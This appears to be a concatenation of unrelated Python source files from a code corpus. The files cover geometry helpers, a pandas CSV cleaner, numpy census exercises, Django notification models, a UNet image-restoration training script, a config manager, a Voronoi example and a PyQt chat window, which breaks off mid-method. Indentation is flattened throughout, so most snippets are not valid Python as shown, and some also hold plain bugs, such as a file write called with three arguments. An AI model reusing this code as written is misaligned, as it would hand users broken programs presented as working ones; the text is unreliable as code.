else:
if (x2b-x2a)!=0:
x=x1b
m2=(y2b-y2a)/(x2b-x2a)
b2=y2a-m2*x2a
y=m2*x+b2
point=[x,y]
else:
print('lines are parallel')
if point!=None:
point=np.array(point)
return point
def _smallestSignedAngleBetween(x,y):
#returns smallest of the two angles from x to y
tau=2*np.pi
a = (x - y) % tau
b = (y - x) % tau
return -a if a < b else b
def _ellipse_point_from_parameter(r,theta,phi,psi,w,l=0.5):
#calculates cartesian coordinates for a point on an ellipse
# with long axis 1, short axis w, ellipse center at r,theta
# that is given by the ellipse parameter psi
x=r*np.cos(theta) + l*np.cos(phi)*np.cos(psi) + w*l*np.sin(phi)*np.sin(psi)
y=r*np.sin(theta) + l*np.sin(phi)*np.cos(psi) - w*l*np.cos(phi)*np.sin(psi)
return [x,y]
def _subjpol_to_objcart(r,theta,pos,phi):
# takes in a point, r, theta from the polar coordinates
# with center at pos and orientation phi
# returns a point in cartesian coordinates (same
# coordinate system that pos is given in)
rot_mat_back=np.array([[np.cos(-phi),np.sin(-phi)],[-np.sin(-phi),np.cos(-phi)]])
pt_subj=[r*np.cos(theta),r*np.sin(theta)]
pt_obj=np.dot(rot_mat_back,pt_subj)+pos
return pt_obj
| StarcoderdataPython |
256356 | <reponame>mtanner161/kingops
##File to Clean the Operating Statment via Wolfpak
import os
import pandas as pd
import numpy as np
import requests
osRaw = pd.read_csv(
r"C:\Users\MichaelTanner\Documents\code_doc\king\combocurve\ComboCurve\operatingstatementOctober.csv"
)
fp = open("./king/combocurve/ComboCurve/cleanOperatingStatment.csv", "w")
fp.write("Date, Description, Value\n")
k = 0
date = np.zeros([len(osRaw.columns) - 4], dtype=str)
dummy = osRaw.iloc[1]
for i in range(3, len(dummy)):
date[i - 2] = dummy.iloc[3:14]
for i in range(3, len(osRaw.columns)):
date[k] = osRaw.iat[0, i]
k = k + 1
for i in range(1, len(osRaw)):
testValue = osRaw[i][4]
if testValue == "nan":
continue
description = osRaw[i][3]
value = []
for j in range(3, len(osRaw.columns)):
fp.write(date[j - 3], description, osRaw[i][j])
print("Hello World")
| StarcoderdataPython |
6617043 | """Current version of package cdesf2"""
__version__ = "1.0.0" | StarcoderdataPython |
11245716 | import ledgerx
from examples.example_util import get_env_api_key
ledgerx.api_key = get_env_api_key()
# id=22202077 -> BTC Mini 2021-12-31 Call $25,000
contract_id = 22202077
contract = ledgerx.Contracts.retrieve(contract_id)
print(contract)
| StarcoderdataPython |
5010668 | <reponame>sharduldk14/greyatom-python-for-data-science<filename>Numpy-Census-Project/code.py
# --------------
# Importing header files
import numpy as np
# Path of the file has been stored in variable called 'path'
#New record
new_record=[[50, 9, 4, 1, 0, 0, 40, 0]]
#Code starts here
data=np.genfromtxt(path,delimiter=",",skip_header=1)
census=np.concatenate([data,new_record])
# --------------
#Code starts here
age=census[:,0]
max_age=age.max()
print(max_age)
min_age=age.min()
age_mean=np.mean(age)
age_std=np.std(age)
# --------------
#Code starts here
race_0=census[census[:,2]==0]
race_1=census[census[:,2]==1]
race_2=census[census[:,2]==2]
race_3=census[census[:,2]==3]
race_4=census[census[:,2]==4]
len_0=len(race_0)
len_1=len(race_1)
len_2=len(race_2)
len_3=len(race_3)
len_4=len(race_4)
len_=[len_0,len_1,len_2,len_3,len_4]
minority_race=len_.index(min(len_))
print(minority_race)
# --------------
#Code starts here
senior_citizens=census[census[:,0]>60]
print(senior_citizens)
working_hours_sum=senior_citizens.sum(axis=0)[6]
#Finding the length of the array
senior_citizens_len=len(senior_citizens)
#Finding the average working hours
avg_working_hours=working_hours_sum/senior_citizens_len
#Printing the average working hours
print((avg_working_hours))
# --------------
#Code starts here
import numpy as np
high=census[census[:,1]>10]
low=census[census[:,1]<=10]
avg_pay_high=high[:,7].mean()
print(avg_pay_high)
avg_pay_low=low[:,7].mean()
print(avg_pay_low)
| StarcoderdataPython |
17090 | <reponame>rithvikp1998/ctci
'''
If the child is currently on the nth step,
then there are three possibilites as to how
it reached there:
1. Reached (n-3)th step and hopped 3 steps in one time
2. Reached (n-2)th step and hopped 2 steps in one time
3. Reached (n-1)th step and hopped 2 steps in one time
The total number of possibilities is the sum of these 3
'''
def count_possibilities(n, store):
if store[n]!=0:
return
count_possibilities(n-1, store)
count_possibilities(n-2, store)
count_possibilities(n-3, store)
store[n]=store[n-1]+store[n-2]+store[n-3]
n=int(input())
store=[0 for i in range(n+1)] # Stores the number of possibilites for every i<n
store[0]=0
store[1]=1
store[2]=2
store[3]=4
count_possibilities(n, store)
print(store[n])
| StarcoderdataPython |
4879154 | from django.db import models
class SubscribeModel(models.Model):
email_id = models.CharField(max_length=255, blank=True)
regist_date = models.CharField(max_length=255, blank=True)
| StarcoderdataPython |
5074353 | """
See problem as defined in "Boosting systematic search by weighting constraints" by Boussemart, Hemery, Lecoutre and Sais, ECAI 2004
Examples of Execution:
python3 QueensKnights.py
python3 QueensKnights.py -data=[15,5]
"""
from pycsp3 import *
n, nKnights = data or (8, 5) # n is the order(board width), and so the number of queens
# q[i] is the column number of the board where is put the ith queen (in the ith row)
q = VarArray(size=n, dom=range(n))
# k[i] is the cell number of the board where is put the ith knight
k = VarArray(size=nKnights, dom=range(n * n))
satisfy(
# all queens are put in different columns
AllDifferent(q),
# controlling no two queens on the same upward diagonal
AllDifferent(q[i] + i for i in range(n)),
# controlling no two queens on the same downward diagonal
AllDifferent(q[i] - i for i in range(n)),
# all knights are put in different cells
AllDifferent(k),
# all knights form a cycle
[(abs(k[i] // n - k[(i + 1) % nKnights] // n), abs(k[i] % n - k[(i + 1) % nKnights] % n)) in {(1, 2), (2, 1)} for i in range(nKnights)]
)
""" Comments
1) adding (q[i] != k[j] % n) | (i != k[j] // n) for i in range(n) for j in range(nKnights) does not seem to filter more values.
2) expressing a table constraint where the scope does not list simple variables entails automatically introducing auxiliary variables at compilation time
""" | StarcoderdataPython |
8163964 | class SerializationException(Exception):
def __init__(self, error_message, path, result, backup_path=None):
self.path = path
self.backup_path = backup_path
self.result = result
super(SerializationException, self).__init__(error_message)
class DeserializationException(Exception):
def __init__(self, error_message, path, backup_path=None):
self.path = path
self.backup_path = backup_path
super(DeserializationException, self).__init__(error_message)
| StarcoderdataPython |
1826716 | <gh_stars>0
"""
Desarrolle un algoritmo, que dado como dato una temperatura en grados Fahrenheit, determine el deporte que es apropiado practicar a esa temperatura, teniendo en cuenta la siguiente tabla:
"""
T=float(input("Digite la temperatura: "))
if(T>85):
print("Deporte que es apropiado practicar a esa temperatura: Natación")
elif(T>=71 and T<=85):
print("Deporte que es apropiado practicar a esa temperatura: Tenis")
elif(T>=33 and T<=70):
print("Deporte que es apropiado practicar a esa temperatura: Golf")
elif(T>=11 and T<=32):
print("Deporte que es apropiado practicar a esa temperatura: Esquí")
elif(T<=10):
print("Deporte que es apropiado practicar a esa temperatura: Marcha")
else:
print("Deporte que es apropiado practicar a esa temperatura: No se identifico deporte") | StarcoderdataPython |
1986580 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from structural_patterns.decorator.frame import Frame
# ˄
class SideFrame(Frame):
# ˅
# ˄
def __init__(self, display, frame_char):
# Decoration character
self.__frame_char = frame_char
# ˅
super().__init__(display)
# ˄
# Number of characters added left and right decoration characters
def get_columns(self):
# ˅
return 1 + self.display.get_columns() + 1
# ˄
# Number of lines
def get_rows(self):
# ˅
return self.display.get_rows()
# ˄
def get_line_text(self, row):
# ˅
return self.__frame_char + self.display.get_line_text(row) + self.__frame_char
# ˄
# ˅
# ˄
# ˅
# ˄
| StarcoderdataPython |
5131494 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import (QApplication, QWidget)
class MainWidget(QWidget):
def __init__(self):
QWidget.__init__(parent=None, flags=0)
app = QApplication(sys.argv)
w = MainWidget()
app.exec()
| StarcoderdataPython |
4830080 | '''
practice qusestion from chapter 1 Module 5 of IBM Digital Nation Courses
by <NAME>/<NAME>
'''
#testing variables
x = 25
print (x)
x = 30
print (x)
#end of the Program | StarcoderdataPython |
356222 | <filename>UNetRestoration/train.py
"""
Main training file
The goal is to correct the colors in underwater images.
The image pair contains color-distort image (which can be generate by CycleGan),and ground-truth image
Then, we use the u-net, which will attempt to correct the colors
"""
import tensorflow as tf
from scipy import misc
import math
import glob
import numpy as np
import os
import time
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
# my imports
from unet_model import UNet
from utils import BatchRename, ImageProcess
init_learning_rate = 1e-4
# Momentum Optimizer
nesterov_momentum = 0.9
# l2 regularizer
weight_decay = 1e-4
batch_size = 32
total_epochs = 10
trainA_path = '/home/frost/image_enhance/UIE/UWGAN_Results/Water_near_1/results_1/water/'
trainB_path = '/home/frost/image_enhance/UIE/UWGAN_Results/Water_near_1/results_1/air/'
log_path = './Far2/logs_l1/'
ckpt_path = './Far2/checkpoints_l1/'
def cosine_learning_rate(learn_rate, n_epochs, cur_epoch):
"""
cosine decay learning rate from 0.1~0, during training phase
:param learn_rate: 0.1, initial learning rate
:param n_epochs: 300, total epochs
:param epoch: current epoch
:return: cosine_learning_rate
"""
t_total = n_epochs
t_cur = cur_epoch
learning_rate_cosine = 0.5 * learn_rate * (1 + math.cos(math.pi * t_cur / t_total))
return learning_rate_cosine
if __name__ == "__main__":
if not os.path.exists(log_path):
os.makedirs(log_path)
if not os.path.exists(ckpt_path):
os.mkdir(ckpt_path)
print("Params Config:\n")
print("Learning Rate: %f" % init_learning_rate)
print(" Optimizer: Adam")
print(" Batch Size: %d " % batch_size)
print(" Train Epochs: %d " % total_epochs)
# rename pic for underwater image and ground truth image
# BatchRename(image_path=trainA_path).rename()
# BatchRename(image_path=trainB_path).rename()
# underwater image
image_u = tf.placeholder(dtype=tf.float32, shape=[None, 256, 256, 3], name='image_u')
# correct image
image_r = tf.placeholder(dtype=tf.float32, shape=[None, 256, 256, 3], name='image_r')
training_flag = tf.placeholder(tf.bool)
learning_rate = tf.placeholder(tf.float32, shape=[], name='learning_rate')
lr_sum = tf.summary.scalar('lr', learning_rate)
# generated color image by u-net
U_NET = UNet(input_=image_u, real_=image_r, is_training=training_flag)
gen_image = U_NET.u_net(inputs=image_u, training=training_flag)
G_sum = tf.summary.image("gen_image", gen_image, max_outputs=10)
# loss of u-net
errG = U_NET.l1_loss(gt=image_r, gen=gen_image)
# errG = U_NET.mse_loss(gt=image_r, gen=gen_image)
# errG = U_NET.ssim_loss(gt=image_r, gen=gen_image)
# errG = U_NET.msssim_loss(gt=image_r, gen=gen_image)
# errG = U_NET.gdl_loss(gt=image_r, gen=gen_image)
# errG = U_NET.l2_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
# errG = U_NET.ssim_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
# errG = U_NET.msssim_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
# errG = U_NET.gdl_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
errG_sum = tf.summary.scalar("loss", errG)
t_var = tf.trainable_variables()
g_vars = [var for var in t_var]
# if consider l2 regularization
# l2_loss = tf.add_n([tf.nn.l2_loss(var) for var in t_var])
# optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=nesterov_momentum, use_nesterov=True)
# train_op = optimizer.minimize(errG + l2_loss * weight_decay)
train_op = optimizer.minimize(loss=errG)
# TensorBoard Summaries
# tf.summary.scalar('batch_loss', tf.reduce_mean(errG))
# tf.summary.scalar('learning_rate', learning_rate)
# try:
# tf.summary.scalar('l2_loss', tf.reduce_mean(l2_loss))
# except: pass
# saver = tf.train.Saver(tf.global_variables())
config = tf.ConfigProto()
# restrict model GPU memory utilization to min required
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
ckpt = tf.train.get_checkpoint_state(ckpt_path)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
U_NET.restore(sess=sess, model_path=ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
all_sum = tf.summary.merge([G_sum, errG_sum, lr_sum])
train_summary_writer = tf.summary.FileWriter(log_path, sess.graph)
# merged_summary_op = tf.summary.merge_all()
# load data
# trainA_paths for underwater image
# trainB_paths for ground truth image
img_process = ImageProcess(pathA=trainA_path + '*.png',
pathB=trainB_path + '*.png',
batch_size=batch_size,
is_aug=False)
counter = 1
trainA_paths, trainB_paths = img_process.load_data()
for epoch in range(1, total_epochs+1):
# epoch_learning_rate = cosine_learning_rate(learn_rate=init_learning_rate,
# n_epochs=total_epochs,
# cur_epoch=epoch)
epoch_learning_rate = init_learning_rate
# total_loss = []
start_time = time.time()
for step in range(1, int(len(trainA_paths)/batch_size)):
batchA_images, batchB_images = img_process.shuffle_data(trainA_paths, trainB_paths)
train_feed_dict = {
image_u: batchA_images,
image_r: batchB_images,
learning_rate: epoch_learning_rate,
training_flag: True
}
_, summary_str = sess.run([train_op, all_sum], feed_dict=train_feed_dict)
train_summary_writer.add_summary(summary=summary_str, global_step=counter)
# batch_loss = sess.run(errG, feed_dict=train_feed_dict)
# total_loss.append(batch_loss)
counter += 1
end_time = time.time()
# train_loss = np.mean(total_loss)
line = "epoch: %d/%d, time cost: %.4f\n" % (epoch, total_epochs, float(end_time - start_time))
# line = "epoch: %d/%d, train loss: %.4f, time cost: %.4f\n" % (epoch, total_epochs, float(train_loss), float(end_time - start_time))
print(line)
if epoch % 10 == 0:
U_NET.save(sess=sess, model_path=ckpt_path + str(epoch)+'u_net.ckpt')
| StarcoderdataPython |
5064315 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Vim:fenc=utf-8
#
# Copyright © 2018 <NAME> <<EMAIL>>
#
# Distributed under terms of the MIT license.
"""Ensure the example files are valid."""
from pathlib import Path
import pytest
from click.testing import CliRunner
from experi.run import main
@pytest.fixture
def runner():
yield CliRunner()
def example_files():
for f in Path("examples").glob("*.yml"):
yield str(f)
@pytest.mark.parametrize("filename", example_files())
def test_examples(runner, filename):
assert Path(filename).is_file()
result = runner.invoke(main, ["--dry-run", "--input-file", filename])
assert result.exit_code == 0, result.output
| StarcoderdataPython |
3467453 | import json
from pathlib import Path
from typing import Dict, Set
from dtags.commons import normalize_tags
from dtags.exceptions import DtagsError
CONFIG_ROOT = ".dtags"
CONFIG_FILE = "config.json"
COMP_FILE = "completion" # used for tag name completion
DEST_FILE = "destination" # used for d command
ConfigType = Dict[str, Dict[Path, Set[str]]]
def get_file_path(filename: str) -> Path:
return Path.home() / CONFIG_ROOT / filename
def get_new_config() -> ConfigType:
return {"tags": {}}
def load_config_file() -> ConfigType:
config_file_path = get_file_path(CONFIG_FILE)
try:
with open(config_file_path, "r") as fp:
config_data = json.load(fp)
except FileNotFoundError:
new_data = get_new_config()
save_config_file(new_data)
return new_data
except ValueError as err: # pragma no cover
raise DtagsError(f"Bad data in {config_file_path.as_posix()}: {err}")
else:
tag_config = config_data["tags"]
return {
"tags": {
Path(dirpath): normalize_tags(tags)
for dirpath, tags in tag_config.items()
}
}
def save_config_file(config: ConfigType) -> None:
config_file_path = get_file_path(CONFIG_FILE)
config_file_path.parent.mkdir(mode=0o755, exist_ok=True)
config_data = {
"tags": {
dirpath.as_posix(): sorted(tags)
for dirpath, tags in config["tags"].items()
if len(tags) > 0
}
}
with open(config_file_path, "w") as fp:
json.dump(config_data, fp, sort_keys=True, indent=2)
save_completion_file(config)
def save_completion_file(config: ConfigType) -> None:
all_tags: Set[str] = set()
for tags in config["tags"].values():
all_tags.update(tags)
with open(get_file_path(COMP_FILE), "w") as fp:
fp.write(" ".join(all_tags))
def save_destination_file(dirpath: Path) -> None:
with open(get_file_path(DEST_FILE), "w") as fp:
fp.write(dirpath.as_posix())
| StarcoderdataPython |
8108459 | <reponame>metakirby5/jisho-to-anki<gh_stars>0
# -*- coding: utf-8 -*-
"""
Configuration values.
"""
import json
class Config:
def __init__(self, fp):
config = json.load(fp)
self.profile: str = config['profile']
self.note: str = config['note']
self.deck: str = config['deck']
self.tags: str = config['tags']
fields = config['fields']
def get_field(name: str):
return 'fld' + fields[name]
self.meaning_field: str = get_field('meaning')
self.reading_field: str = get_field('reading')
self.word_field: str = get_field('word')
| StarcoderdataPython |
8109779 | # coding:utf-8
from django.db import models
from django.contrib.auth.models import User
from django.utils.html import escape
class Activity(models.Model):
FAVORITE = 'F'
LIKE = 'L'
UP_VOTE = 'U'
DOWN_VOTE = 'D'
ACTIVITY_TYPES = (
(FAVORITE, 'Favorite'),
(LIKE, 'Like'),
(UP_VOTE, 'Up Vote'),
(DOWN_VOTE, 'Down Vote'),
)
user = models.ForeignKey(User)
activity_type = models.CharField(max_length=1, choices=ACTIVITY_TYPES)
date = models.DateTimeField(auto_now_add=True)
feed = models.IntegerField(null=True, blank=True)
question = models.IntegerField(null=True, blank=True)
answer = models.IntegerField(null=True, blank=True)
class Meta:
verbose_name = 'Activity'
verbose_name_plural = 'Activities'
def __unicode__(self):
return self.activity_type
# def save(self, *args, **kwargs):
# super(Activity, self).save(*args, **kwargs)
# if self.activity_type == Activity.FAVORITE:
# Question = models.get_model('questions', 'Question')
# question = Question.objects.get(pk=self.question)
# user = question.user
# user.profile.reputation = user.profile.reputation + 5
# user.save()
class Notification(models.Model):
LIKED = 'L'
COMMENTED = 'C'
FAVORITED = 'F'
ANSWERED = 'A'
ACCEPTED_ANSWER = 'W'
EDITED_ARTICLE = 'E'
ALSO_COMMENTED = 'S'
NOTIFICATION_TYPES = (
(LIKED, 'Liked'),
(COMMENTED, 'Commented'),
(FAVORITED, 'Favorited'),
(ANSWERED, 'Answered'),
(ACCEPTED_ANSWER, 'Accepted Answer'),
(EDITED_ARTICLE, 'Edited Article'),
(ALSO_COMMENTED, 'Also Commented'),
)
# _LIKED_TEMPLATE = u'<a href="/{0}/"><div class="user"><img src="{1}" class="user-picture">{2}</a> 赞了你的帖:</div>' \
# u'<span class="label label-info"><a style="border-top: 0px" href="/feeds/{3}/">' \
# u'<i class="menu-icon fa fa-list-alt"></i>{4}</a></span>'
_LIKED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/feeds/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">赞了: {4}</span></div>' \
u'</div> '
# _COMMENTED_TEMPLATE = u'<a href="/{0}/">{1}</a> 评论了你的帖: ' \
# u'<a style="border-top: 0px" href="/feeds/{2}/">{3}</a>'
_COMMENTED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/feeds/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">评论了: {4}</span></div>' \
u'</div> '
# _FAVORITED_TEMPLATE = u'<a href="/{0}/">{1}</a>关注了你的问题: ' \
# u'<a style="border-top: 0px" href="/questions/{2}/">{3}</a>'
_FAVORITED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/questions/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">关注: {4}</span></div>' \
u'</div> '
# _ANSWERED_TEMPLATE = u'<a href="/{0}/">{1}</a> 回答了你的问题: ' \
# u'<a style="border-top: 0px" href="/questions/{2}/">{3}</a>'
_ANSWERED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/questions/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">回答: {4}</span></div>' \
u'</div> '
# _ACCEPTED_ANSWER_TEMPLATE = u'<a href="/{0}/">{1}</a> 接受了你的答案: ' \
# u'<a style="border-top: 0px" href="/questions/{2}/">{3}</a>'
_ACCEPTED_ANSWER_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/questions/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">接受答案: {4}</span></div>' \
u'</div> '
# _EDITED_ARTICLE_TEMPLATE = u'<a href="/{0}/">{1}</a> 编辑了你的文章: ' \
# u'<a style="border-top: 0px" href="/article/{2}/">{3}</a>'
_EDITED_ARTICLE_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/article/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">编辑: {4}</span></div>' \
u'</div> '
# _ALSO_COMMENTED_TEMPLATE = u'<a href="/{0}/">{1}</a> 也评论了贴: ' \
# u'<a style="border-top: 0px" href="/feeds/{2}/">{3}</a>'
_ALSO_COMMENTED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/feeds/{1}/">' \
u'<div class="clearfix"> ' \
u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
u'<div class="clearfix"><span class="pull-right">也评论: {4}</span></div>' \
u'</div> '
from_user = models.ForeignKey(User, related_name='+')
to_user = models.ForeignKey(User, related_name='+')
date = models.DateTimeField(auto_now_add=True)
feed = models.ForeignKey('feeds.Feed', null=True, blank=True)
question = models.ForeignKey('questions.Question', null=True, blank=True)
answer = models.ForeignKey('questions.Answer', null=True, blank=True)
article = models.ForeignKey('articles.Article', null=True, blank=True)
notification_type = models.CharField(max_length=1, choices=NOTIFICATION_TYPES)
is_read = models.BooleanField(default=False)
class Meta:
verbose_name = 'Notification'
verbose_name_plural = 'Notifications'
ordering = ('-date',)
def __unicode__(self):
if self.notification_type == self.LIKED:
return self._LIKED_TEMPLATE.format(
self.pk,
self.feed.pk,
escape(self.from_user.profile.get_picture()),
# escape(self.from_user.username),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.feed.post)),
)
elif self.notification_type == self.COMMENTED:
return self._COMMENTED_TEMPLATE.format(
self.pk,
self.feed.pk,
escape(self.from_user.profile.get_picture()),
# escape(self.from_user.username),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.feed.post))
)
elif self.notification_type == self.FAVORITED:
return self._FAVORITED_TEMPLATE.format(
self.pk,
self.question.pk,
# escape(self.from_user.username),
escape(self.from_user.profile.get_picture()),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.question.title))
)
elif self.notification_type == self.ANSWERED:
return self._ANSWERED_TEMPLATE.format(
self.pk,
self.question.pk,
# escape(self.from_user.username),
escape(self.from_user.profile.get_picture()),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.question.title))
)
elif self.notification_type == self.ACCEPTED_ANSWER:
return self._ACCEPTED_ANSWER_TEMPLATE.format(
self.pk,
self.answer.question.pk,
# escape(self.from_user.username),
escape(self.from_user.profile.get_picture()),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.answer.description))
)
elif self.notification_type == self.EDITED_ARTICLE:
return self._EDITED_ARTICLE_TEMPLATE.format(
self.pk,
self.article.slug,
# escape(self.from_user.username),
escape(self.from_user.profile.get_picture()),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.article.title))
)
elif self.notification_type == self.ALSO_COMMENTED:
return self._ALSO_COMMENTED_TEMPLATE.format(
self.pk,
# escape(self.from_user.username),
escape(self.from_user.profile.get_picture()),
escape(self.from_user.profile.get_screen_name()),
escape(self.get_summary(self.feed.post))
)
else:
return 'Ooops! Something went wrong.'
def get_summary(self, value):
summary_size = 7
if len(value) > summary_size:
return u'{0}...'.format(value[:summary_size])
else:
return value
# APP的 Activity 用于搜集汇总用户的参与行为
# 如参与菜品点赞
class AppActivity(models.Model):
ASSET = 'A'
ACTIVITY_TYPES = (
(ASSET, u'资产管理'),
)
user = models.ForeignKey(User)
activity_type = models.CharField(max_length=1, choices=ACTIVITY_TYPES)
date = models.DateTimeField(auto_now_add=True)
class Meta:
verbose_name = 'AppActivity'
verbose_name_plural = 'AppActivities'
def __unicode__(self):
return self.activity_type
# APP Notification 泛化消息通知,应对可添加App模块,而不用改动表结构
class AppNotification(models.Model):
# 列出使用的App
# asset
ASSET = 'AM'
APPS_ICO = {
ASSET: 'fa-eye'
}
APPS_NAME_DICT = {
ASSET: u'资产管理'
}
RETURN_IN_NAVBAR_TEMPLATE = {
ASSET: u'<a href="/notification/read?notification_type=app¬ification_id={0}&next={1}">'
u'<div class="clearfix"><span class="pull-left">'
u'<i class="btn btn-xs no-hover btn-pink fa {2}"></i> <b>{3}</b> </span>'
u'<span class="pull-right"> {4} </span></div> ',
}
RETURN_IN_ALL_TEMPLATE = {
ASSET: u'',
}
APPS_NAME_TUPLE = tuple(APPS_NAME_DICT.items())
from_user = models.ForeignKey(User, related_name='+')
to_user = models.ForeignKey(User, related_name='+')
from_app = models.CharField(max_length=3, choices=APPS_NAME_TUPLE)
content = models.CharField(max_length=32)
to_do_reference_url = models.CharField(max_length=2048)
is_read = models.BooleanField(default=False)
date = models.DateTimeField(auto_now_add=True)
class Meta:
verbose_name = 'AppNotification'
verbose_name_plural = 'AppNotification'
ordering = ('-date',)
def __unicode__(self):
for app in self.APPS_NAME_TUPLE:
app_name_flag = app[0]
if self.from_app == app_name_flag:
return self.RETURN_IN_NAVBAR_TEMPLATE[app_name_flag].format(
self.pk,
escape(self.to_do_reference_url),
escape(self.APPS_ICO[app_name_flag]),
escape(self.APPS_NAME_DICT[app_name_flag]),
escape(self.content)
)
return 'Ooops! Something went wrong.'
def get_ico(self):
return self.APPS_ICO[self.from_app]
def get_app_name(self):
return self.APPS_NAME_DICT[self.from_app] | StarcoderdataPython |
5198397 | <filename>setup.py<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import find_packages, setup
from ml import __version__
setup(
name='ml',
version=__version__,
license='PRIVATE',
author='',
author_email='',
description='robin know everything',
url='<EMAIL>:Fydot/ml.git',
packages=find_packages(exclude=['tests']),
package_data={'ml': ['CHANGES.rst', 'README.md']},
zip_safe=False,
install_requires=[
'numpy',
'scikit-learn',
],
entry_points={
'console_scripts': [],
}
)
| StarcoderdataPython |
5123162 | from voronoi import Voronoi, Polygon
# Define a set of points
points = [
(2.5, 2.5),
(4, 7.5),
(7.5, 2.5),
(6, 7.5),
(4, 4),
(3, 3),
(6, 3),
]
# Define a bounding box
polygon = Polygon([
(2.5, 10),
(5, 10),
(10, 5),
(10, 2.5),
(5, 0),
(2.5, 0),
(0, 2.5),
(0, 5),
])
# Initialize the algorithm
v = Voronoi(polygon)
# Create the diagram
v.create_diagram(points=points, vis_steps=False, verbose=False, vis_result=True, vis_tree=True)
# Get properties
edges = v.edges
vertices = v.vertices
arcs = v.arcs
points = v.points
# Calculate the sell size for each point
for point in v.points:
print(f"{(point.x, point.y)} \t {point.cell_size()}")
# for point in v.points:
# print([(round(p.x, 2), round(p.y, 2)) for p in point.get_coordinates()])
print(v.points[0].get_coordinates()) | StarcoderdataPython |
5098960 | import sys
from PyQt4 import QtCore, QtGui
from ui.ui_chat import Ui_chatWindow
class ChatWindow(QtGui.QWidget, Ui_chatWindow):
def __init__(self):
QtGui.QWidget.__init__(self)
self.setupUi(self)
self.chat_view = self.chatHistoryTextEdit
self.convTab.clear()
self.convTab.setDocumentMode(True)
self.convTab.currentChanged.connect(self.current_tab_changed)
self.convTab.tabBar().tabCloseRequested.connect(self.tab_close_requested)
def add_tab(self, contact_uri):
if self.isHidden():
self.show()
if contact_uri == '10000':
label = "sys info"
else:
label = contact_uri
chat_input = QtGui.QTextEdit()
new_idx = self.convTab.addTab(chat_input, QtCore.QString(label))
self.convTab.setCurrentIndex(new_idx)
tabbar = self.convTab.tabBar()
tabbar.setTabData(new_idx, contact_uri)
#self.convTab.tabBar().setTabData(new_idx, contact_uri)
#self.focus_on_current_chat_tab()
self.convTab.setTabBar(tabbar)
self.contactNameLabel.setText(label)
def current_tab_changed(self, idx):
print("current_tab_changed")
print("current idx: %d" % idx)
NO_TAB = -1
if idx == NO_TAB:
return
tabbar = self.convTab.tabBar()
display_name = tabbar.tabText(idx)
self.contactNameLabel.setText(display_name)
contact_uri = tabbar.tabData(idx)
print "type:", contact_uri
print "contact_uri:", contact_uri.toString()
def tab_close_requested(self, idx):
no_input = self.convTab.widget(idx).toPlainText()
if not no_input:
self.convTab.removeTab(idx)
else:
msg = "Pressing the ESC key will close this conversation. <br />" \
"Are you sure you want to continue ?"
if popup_confirm(self, msg):
self.convTab.removeTab(idx)
if not self.convTab.count():
self.hide()
def _close_current_tab(self):
self.convTab.removeTab(self.convTab.currentIndex())
if not self.convTab.count():
self.hide()
def go_to_tab_by_uri(self, contact_uri):
for idx in xrange(self.convTab.count()):
tab_uri = str(self.convTab.tabBar().tabData(idx).toString())
if tab_uri == contact_uri:
print("go to existed chat tab")
self.convTab.setCurrentIndex(idx)
self.focus_on_current_chat_tab()
return True
return False
def keyPressEvent(self, event):
key = event.key()
is_goto_prev_tab = (event.modifiers() == QtCore.Qt.ControlModifier) and (key == QtCore.Qt.Key_BracketLeft)
is_goto_next_tab = (event.modifiers() == QtCore.Qt.ControlModifier) and (key == QtCore.Qt.Key_BracketRight)
is_send_msg = key == QtCore.Qt.Key_Return
is_close_tab = key == QtCore.Qt.Key_Escape
is_switch_tab = (event.modifiers() == QtCore.Qt.ControlModifier) and (key >= QtCore.Qt.Key_1 and key <= QtCore.Qt.Key_9)
CHAR_START_AT = 48
if is_close_tab:
if not self.convTab.count():
self.hide()
return
